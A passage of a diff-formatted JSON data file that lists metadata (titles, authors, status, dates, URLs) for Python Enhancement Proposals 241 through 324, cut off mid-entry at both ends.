"url": "https://peps.python.org/pep-0241/" + }, + "242": { + "number": 242, + "title": "Numeric Kinds", + "authors": "Paul F. 
Dubois", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "17-Mar-2001", + "python_version": "2.2", + "post_history": "17-Apr-2001", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0242/" + }, + "243": { + "number": 243, + "title": "Module Repository Upload Mechanism", + "authors": "Sean Reifschneider", + "discussions_to": "distutils-sig@python.org", + "status": "Withdrawn", + "type": "Standards Track", + "topic": "packaging", + "created": "18-Mar-2001", + "python_version": "2.1", + "post_history": "20-Mar-2001, 24-Mar-2001", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0243/" + }, + "244": { + "number": 244, + "title": "The ``directive`` statement", + "authors": "Martin von L\u00f6wis", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "20-Mar-2001", + "python_version": "2.1", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0244/" + }, + "245": { + "number": 245, + "title": "Python Interface Syntax", + "authors": "Michel Pelletier", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "11-Jan-2001", + "python_version": "2.2", + "post_history": "21-Mar-2001", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0245/" + }, + "246": { + "number": 246, + "title": "Object Adaptation", + "authors": "Alex Martelli, Clark C. Evans", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "21-Mar-2001", + "python_version": "2.5", + "post_history": "29-Mar-2001, 10-Jan-2005", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0246/" + }, + "247": { + "number": 247, + "title": "API for Cryptographic Hash Functions", + "authors": "A.M. 
Kuchling", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "", + "created": "23-Mar-2001", + "python_version": null, + "post_history": "20-Sep-2001", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0247/" + }, + "248": { + "number": 248, + "title": "Python Database API Specification v1.0", + "authors": "Greg Stein, Marc-Andr\u00e9 Lemburg", + "discussions_to": "db-sig@python.org", + "status": "Final", + "type": "Informational", + "topic": "", + "created": "08-May-1996", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": "249", + "url": "https://peps.python.org/pep-0248/" + }, + "249": { + "number": 249, + "title": "Python Database API Specification v2.0", + "authors": "Marc-Andr\u00e9 Lemburg", + "discussions_to": "db-sig@python.org", + "status": "Final", + "type": "Informational", + "topic": "", + "created": "12-Apr-1999", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": "248", + "superseded_by": null, + "url": "https://peps.python.org/pep-0249/" + }, + "250": { + "number": 250, + "title": "Using site-packages on Windows", + "authors": "Paul Moore", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "30-Mar-2001", + "python_version": "2.2", + "post_history": "30-Mar-2001", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0250/" + }, + "251": { + "number": 251, + "title": "Python 2.2 Release Schedule", + "authors": "Barry Warsaw, Guido van Rossum", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "release", + "created": "17-Apr-2001", + "python_version": "2.2", + "post_history": "14-Aug-2001", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0251/" + }, + "252": { + "number": 252, + "title": "Making Types Look More Like Classes", + "authors": "Guido van Rossum", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "19-Apr-2001", + "python_version": "2.2", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0252/" + }, + "253": { + "number": 253, + "title": "Subtyping Built-in Types", + "authors": "Guido van Rossum", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "14-May-2001", + "python_version": "2.2", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0253/" + }, + "254": { + "number": 254, + "title": "Making Classes Look More Like Types", + "authors": "Guido van Rossum", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "18-Jun-2001", + "python_version": "2.2", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0254/" + }, + "255": { + "number": 255, + "title": "Simple Generators", + "authors": "Neil Schemenauer, Tim Peters, Magnus Lie Hetland", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": 
"18-May-2001", + "python_version": "2.2", + "post_history": "14-Jun-2001, 23-Jun-2001", + "resolution": null, + "requires": "234", + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0255/" + }, + "256": { + "number": 256, + "title": "Docstring Processing System Framework", + "authors": "David Goodger", + "discussions_to": "doc-sig@python.org", + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "01-Jun-2001", + "python_version": null, + "post_history": "13-Jun-2001", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0256/" + }, + "257": { + "number": 257, + "title": "Docstring Conventions", + "authors": "David Goodger, Guido van Rossum", + "discussions_to": "doc-sig@python.org", + "status": "Active", + "type": "Informational", + "topic": "", + "created": "29-May-2001", + "python_version": null, + "post_history": "13-Jun-2001", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0257/" + }, + "258": { + "number": 258, + "title": "Docutils Design Specification", + "authors": "David Goodger", + "discussions_to": "doc-sig@python.org", + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "31-May-2001", + "python_version": null, + "post_history": "13-Jun-2001", + "resolution": null, + "requires": "256, 257", + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0258/" + }, + "259": { + "number": 259, + "title": "Omit printing newline after newline", + "authors": "Guido van Rossum", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "11-Jun-2001", + "python_version": "2.2", + "post_history": "11-Jun-2001", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0259/" + }, + "260": { + "number": 260, + "title": "Simplify xrange()", + "authors": "Guido van Rossum", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "26-Jun-2001", + "python_version": "2.2", + "post_history": "26-Jun-2001", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0260/" + }, + "261": { + "number": 261, + "title": "Support for \"wide\" Unicode characters", + "authors": "Paul Prescod", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "27-Jun-2001", + "python_version": "2.2", + "post_history": "27-Jun-2001", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0261/" + }, + "262": { + "number": 262, + "title": "A Database of Installed Python Packages", + "authors": "A.M. 
Kuchling", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "packaging", + "created": "08-Jul-2001", + "python_version": null, + "post_history": "27-Mar-2002", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0262/" + }, + "263": { + "number": 263, + "title": "Defining Python Source Code Encodings", + "authors": "Marc-Andr\u00e9 Lemburg, Martin von L\u00f6wis", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "06-Jun-2001", + "python_version": "2.3", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0263/" + }, + "264": { + "number": 264, + "title": "Future statements in simulated shells", + "authors": "Michael Hudson", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "30-Jul-2001", + "python_version": "2.2", + "post_history": "30-Jul-2001", + "resolution": null, + "requires": "236", + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0264/" + }, + "265": { + "number": 265, + "title": "Sorting Dictionaries by Value", + "authors": "Grant Griffin", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "08-Aug-2001", + "python_version": "2.2", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0265/" + }, + "266": { + "number": 266, + "title": "Optimizing Global Variable/Attribute Access", + "authors": "Skip Montanaro", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "13-Aug-2001", + "python_version": "2.3", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0266/" + }, + "267": { + "number": 267, + "title": "Optimized Access to Module Namespaces", + "authors": "Jeremy Hylton", + "discussions_to": null, + "status": "Deferred", + "type": "Standards Track", + "topic": "", + "created": "23-May-2001", + "python_version": "2.2", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0267/" + }, + "268": { + "number": 268, + "title": "Extended HTTP functionality and WebDAV", + "authors": "Greg Stein", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "20-Aug-2001", + "python_version": "2.x", + "post_history": "21-Aug-2001", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0268/" + }, + "269": { + "number": 269, + "title": "Pgen Module for Python", + "authors": "Jonathan Riehl", + "discussions_to": null, + "status": "Deferred", + "type": "Standards Track", + "topic": "", + "created": "24-Aug-2001", + "python_version": "2.2", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0269/" + }, + "270": { + "number": 270, + "title": "uniq method for list objects", + "authors": "Jason Petrone", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "21-Aug-2001", + "python_version": 
"2.2", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0270/" + }, + "271": { + "number": 271, + "title": "Prefixing sys.path by command line option", + "authors": "Fr\u00e9d\u00e9ric B. Giacometti", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "15-Aug-2001", + "python_version": "2.2", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0271/" + }, + "272": { + "number": 272, + "title": "API for Block Encryption Algorithms v1.0", + "authors": "A.M. Kuchling", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "", + "created": "18-Sep-2001", + "python_version": null, + "post_history": "17-Apr-2002, 29-May-2002", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0272/" + }, + "273": { + "number": 273, + "title": "Import Modules from Zip Archives", + "authors": "James C. Ahlstrom", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "11-Oct-2001", + "python_version": "2.3", + "post_history": "26-Oct-2001", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0273/" + }, + "274": { + "number": 274, + "title": "Dict Comprehensions", + "authors": "Barry Warsaw", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "25-Oct-2001", + "python_version": "2.7, 3.0", + "post_history": "29-Oct-2001", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0274/" + }, + "275": { + "number": 275, + "title": "Switching on Multiple Values", + "authors": "Marc-Andr\u00e9 Lemburg", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "10-Nov-2001", + "python_version": "2.6", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0275/" + }, + "276": { + "number": 276, + "title": "Simple Iterator for ints", + "authors": "Jim Althoff", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "12-Nov-2001", + "python_version": "2.3", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0276/" + }, + "277": { + "number": 277, + "title": "Unicode file name support for Windows NT", + "authors": "Neil Hodgson", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "11-Jan-2002", + "python_version": "2.3", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0277/" + }, + "278": { + "number": 278, + "title": "Universal Newline Support", + "authors": "Jack Jansen", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "14-Jan-2002", + "python_version": "2.3", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0278/" + }, + "279": { + 
"number": 279, + "title": "The enumerate() built-in function", + "authors": "Raymond Hettinger", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "30-Jan-2002", + "python_version": "2.3", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0279/" + }, + "280": { + "number": 280, + "title": "Optimizing access to globals", + "authors": "Guido van Rossum", + "discussions_to": null, + "status": "Deferred", + "type": "Standards Track", + "topic": "", + "created": "10-Feb-2002", + "python_version": "2.3", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0280/" + }, + "281": { + "number": 281, + "title": "Loop Counter Iteration with range and xrange", + "authors": "Magnus Lie Hetland", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "11-Feb-2002", + "python_version": "2.3", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0281/" + }, + "282": { + "number": 282, + "title": "A Logging System", + "authors": "Vinay Sajip, Trent Mick", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "04-Feb-2002", + "python_version": "2.3", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0282/" + }, + "283": { + "number": 283, + "title": "Python 2.3 Release Schedule", + "authors": "Guido van Rossum", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "release", + "created": "27-Feb-2002", + "python_version": "2.3", + "post_history": "27-Feb-2002", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0283/" + }, + "284": { + "number": 284, + "title": "Integer for-loops", + "authors": "David Eppstein, Gregory Ewing", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "01-Mar-2002", + "python_version": "2.3", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0284/" + }, + "285": { + "number": 285, + "title": "Adding a bool type", + "authors": "Guido van Rossum", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "08-Mar-2002", + "python_version": "2.3", + "post_history": "08-Mar-2002, 30-Mar-2002, 03-Apr-2002", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0285/" + }, + "286": { + "number": 286, + "title": "Enhanced Argument Tuples", + "authors": "Martin von L\u00f6wis", + "discussions_to": null, + "status": "Deferred", + "type": "Standards Track", + "topic": "", + "created": "03-Mar-2002", + "python_version": "2.3", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0286/" + }, + "287": { + "number": 287, + "title": "reStructuredText Docstring Format", + "authors": "David Goodger", + "discussions_to": "doc-sig@python.org", + "status": "Active", + "type": "Informational", + "topic": 
"", + "created": "25-Mar-2002", + "python_version": null, + "post_history": "02-Apr-2002", + "resolution": null, + "requires": null, + "replaces": "216", + "superseded_by": null, + "url": "https://peps.python.org/pep-0287/" + }, + "288": { + "number": 288, + "title": "Generators Attributes and Exceptions", + "authors": "Raymond Hettinger", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "21-Mar-2002", + "python_version": "2.5", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0288/" + }, + "289": { + "number": 289, + "title": "Generator Expressions", + "authors": "Raymond Hettinger", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "30-Jan-2002", + "python_version": "2.4", + "post_history": "22-Oct-2003", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0289/" + }, + "290": { + "number": 290, + "title": "Code Migration and Modernization", + "authors": "Raymond Hettinger", + "discussions_to": null, + "status": "Active", + "type": "Informational", + "topic": "", + "created": "06-Jun-2002", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0290/" + }, + "291": { + "number": 291, + "title": "Backward Compatibility for the Python 2 Standard Library", + "authors": "Neal Norwitz", + "discussions_to": null, + "status": "Superseded", + "type": "Informational", + "topic": "", + "created": "06-Jun-2002", + "python_version": "2.3", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": "387", + "url": "https://peps.python.org/pep-0291/" + }, + "292": { + "number": 292, + "title": "Simpler String Substitutions", + "authors": "Barry Warsaw", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "18-Jun-2002", + "python_version": "2.4", + "post_history": "18-Jun-2002, 23-Mar-2004, 22-Aug-2004", + "resolution": null, + "requires": null, + "replaces": "215", + "superseded_by": null, + "url": "https://peps.python.org/pep-0292/" + }, + "293": { + "number": 293, + "title": "Codec Error Handling Callbacks", + "authors": "Walter D\u00f6rwald", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "18-Jun-2002", + "python_version": "2.3", + "post_history": "19-Jun-2002", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0293/" + }, + "294": { + "number": 294, + "title": "Type Names in the types Module", + "authors": "Oren Tirosh", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "19-Jun-2002", + "python_version": "2.5", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0294/" + }, + "295": { + "number": 295, + "title": "Interpretation of multiline string constants", + "authors": "Stepan Koltsov", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "22-Jul-2002", + "python_version": "3.0", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + 
"superseded_by": null, + "url": "https://peps.python.org/pep-0295/" + }, + "296": { + "number": 296, + "title": "Adding a bytes Object Type", + "authors": "Scott Gilbert", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "12-Jul-2002", + "python_version": "2.3", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0296/" + }, + "297": { + "number": 297, + "title": "Support for System Upgrades", + "authors": "Marc-Andr\u00e9 Lemburg", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "19-Jul-2001", + "python_version": "2.6", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0297/" + }, + "298": { + "number": 298, + "title": "The Locked Buffer Interface", + "authors": "Thomas Heller", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "26-Jul-2002", + "python_version": "2.3", + "post_history": "30-Jul-2002, 01-Aug-2002", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0298/" + }, + "299": { + "number": 299, + "title": "Special __main__() function in modules", + "authors": "Jeff Epler", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "12-Aug-2002", + "python_version": "2.3", + "post_history": "29-Mar-2006", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0299/" + }, + "301": { + "number": 301, + "title": "Package Index and Metadata for Distutils", + "authors": "Richard Jones", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "packaging", + "created": "24-Oct-2002", + "python_version": "2.3", + "post_history": "08-Nov-2002", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0301/" + }, + "302": { + "number": 302, + "title": "New Import Hooks", + "authors": "Just van Rossum, Paul Moore", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "19-Dec-2002", + "python_version": "2.3", + "post_history": "19-Dec-2002", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0302/" + }, + "303": { + "number": 303, + "title": "Extend divmod() for Multiple Divisors", + "authors": "Thomas Bellman", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "31-Dec-2002", + "python_version": "2.3", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0303/" + }, + "304": { + "number": 304, + "title": "Controlling Generation of Bytecode Files", + "authors": "Skip Montanaro", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "22-Jan-2003", + "python_version": null, + "post_history": "27-Jan-2003, 31-Jan-2003, 17-Jun-2005", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0304/" + }, + "305": { + "number": 305, + "title": "CSV File API", 
+ "authors": "Kevin Altis, Dave Cole, Andrew McNamara, Skip Montanaro, Cliff Wells", + "discussions_to": "csv@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "26-Jan-2003", + "python_version": "2.3", + "post_history": "31-Jan-2003, 13-Feb-2003", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0305/" + }, + "306": { + "number": 306, + "title": "How to Change Python's Grammar", + "authors": "Michael Hudson, Jack Diederich, Alyssa Coghlan, Benjamin Peterson", + "discussions_to": null, + "status": "Withdrawn", + "type": "Informational", + "topic": "", + "created": "29-Jan-2003", + "python_version": null, + "post_history": "30-Jan-2003", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0306/" + }, + "307": { + "number": 307, + "title": "Extensions to the pickle protocol", + "authors": "Guido van Rossum, Tim Peters", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "31-Jan-2003", + "python_version": "2.3", + "post_history": "07-Feb-2003", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0307/" + }, + "308": { + "number": 308, + "title": "Conditional Expressions", + "authors": "Guido van Rossum, Raymond Hettinger", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "07-Feb-2003", + "python_version": "2.5", + "post_history": "07-Feb-2003, 11-Feb-2003", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0308/" + }, + "309": { + "number": 309, + "title": "Partial Function Application", + "authors": "Peter Harris", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "08-Feb-2003", + "python_version": "2.5", + "post_history": "10-Feb-2003, 27-Feb-2003, 22-Feb-2004, 28-Apr-2006", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0309/" + }, + "310": { + "number": 310, + "title": "Reliable Acquisition/Release Pairs", + "authors": "Michael Hudson, Paul Moore", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "18-Dec-2002", + "python_version": "2.4", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0310/" + }, + "311": { + "number": 311, + "title": "Simplified Global Interpreter Lock Acquisition for Extensions", + "authors": "Mark Hammond", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "05-Feb-2003", + "python_version": "2.3", + "post_history": "05-Feb-2003, 14-Feb-2003, 19-Apr-2003", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0311/" + }, + "312": { + "number": 312, + "title": "Simple Implicit Lambda", + "authors": "Roman Suzi, Alex Martelli", + "discussions_to": null, + "status": "Deferred", + "type": "Standards Track", + "topic": "", + "created": "11-Feb-2003", + "python_version": "2.4", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0312/" 
+ }, + "313": { + "number": 313, + "title": "Adding Roman Numeral Literals to Python", + "authors": "Mike Meyer", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "01-Apr-2003", + "python_version": "2.4", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0313/" + }, + "314": { + "number": 314, + "title": "Metadata for Python Software Packages 1.1", + "authors": "A.M. Kuchling, Richard Jones", + "discussions_to": "distutils-sig@python.org", + "status": "Superseded", + "type": "Standards Track", + "topic": "packaging", + "created": "12-Apr-2003", + "python_version": "2.5", + "post_history": "29-Apr-2003", + "resolution": null, + "requires": null, + "replaces": "241", + "superseded_by": "345", + "url": "https://peps.python.org/pep-0314/" + }, + "315": { + "number": 315, + "title": "Enhanced While Loop", + "authors": "Raymond Hettinger, W Isaac Carroll", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "25-Apr-2003", + "python_version": "2.5", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0315/" + }, + "316": { + "number": 316, + "title": "Programming by Contract for Python", + "authors": "Terence Way", + "discussions_to": null, + "status": "Deferred", + "type": "Standards Track", + "topic": "", + "created": "02-May-2003", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0316/" + }, + "317": { + "number": 317, + "title": "Eliminate Implicit Exception Instantiation", + "authors": "Steven Taschuk", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "06-May-2003", + "python_version": "2.4", + "post_history": "09-Jun-2003", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0317/" + }, + "318": { + "number": 318, + "title": "Decorators for Functions and Methods", + "authors": "Kevin D. Smith, Jim J. 
Jewett, Skip Montanaro, Anthony Baxter", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "05-Jun-2003", + "python_version": "2.4", + "post_history": "09-Jun-2003, 10-Jun-2003, 27-Feb-2004, 23-Mar-2004, 30-Aug-2004, 02-Sep-2004", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0318/" + }, + "319": { + "number": 319, + "title": "Python Synchronize/Asynchronize Block", + "authors": "Michel Pelletier", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "24-Feb-2003", + "python_version": "2.4", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0319/" + }, + "320": { + "number": 320, + "title": "Python 2.4 Release Schedule", + "authors": "Barry Warsaw, Raymond Hettinger, Anthony Baxter", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "release", + "created": "29-Jul-2003", + "python_version": "2.4", + "post_history": "01-Dec-2004", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0320/" + }, + "321": { + "number": 321, + "title": "Date/Time Parsing and Formatting", + "authors": "A.M. Kuchling", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "16-Sep-2003", + "python_version": "2.4", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0321/" + }, + "322": { + "number": 322, + "title": "Reverse Iteration", + "authors": "Raymond Hettinger", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "24-Sep-2003", + "python_version": "2.4", + "post_history": "24-Sep-2003", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0322/" + }, + "323": { + "number": 323, + "title": "Copyable Iterators", + "authors": "Alex Martelli", + "discussions_to": null, + "status": "Deferred", + "type": "Standards Track", + "topic": "", + "created": "25-Oct-2003", + "python_version": "2.5", + "post_history": "29-Oct-2003", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0323/" + }, + "324": { + "number": 324, + "title": "subprocess - New process module", + "authors": "Peter Astrand", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "19-Nov-2003", + "python_version": "2.4", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + 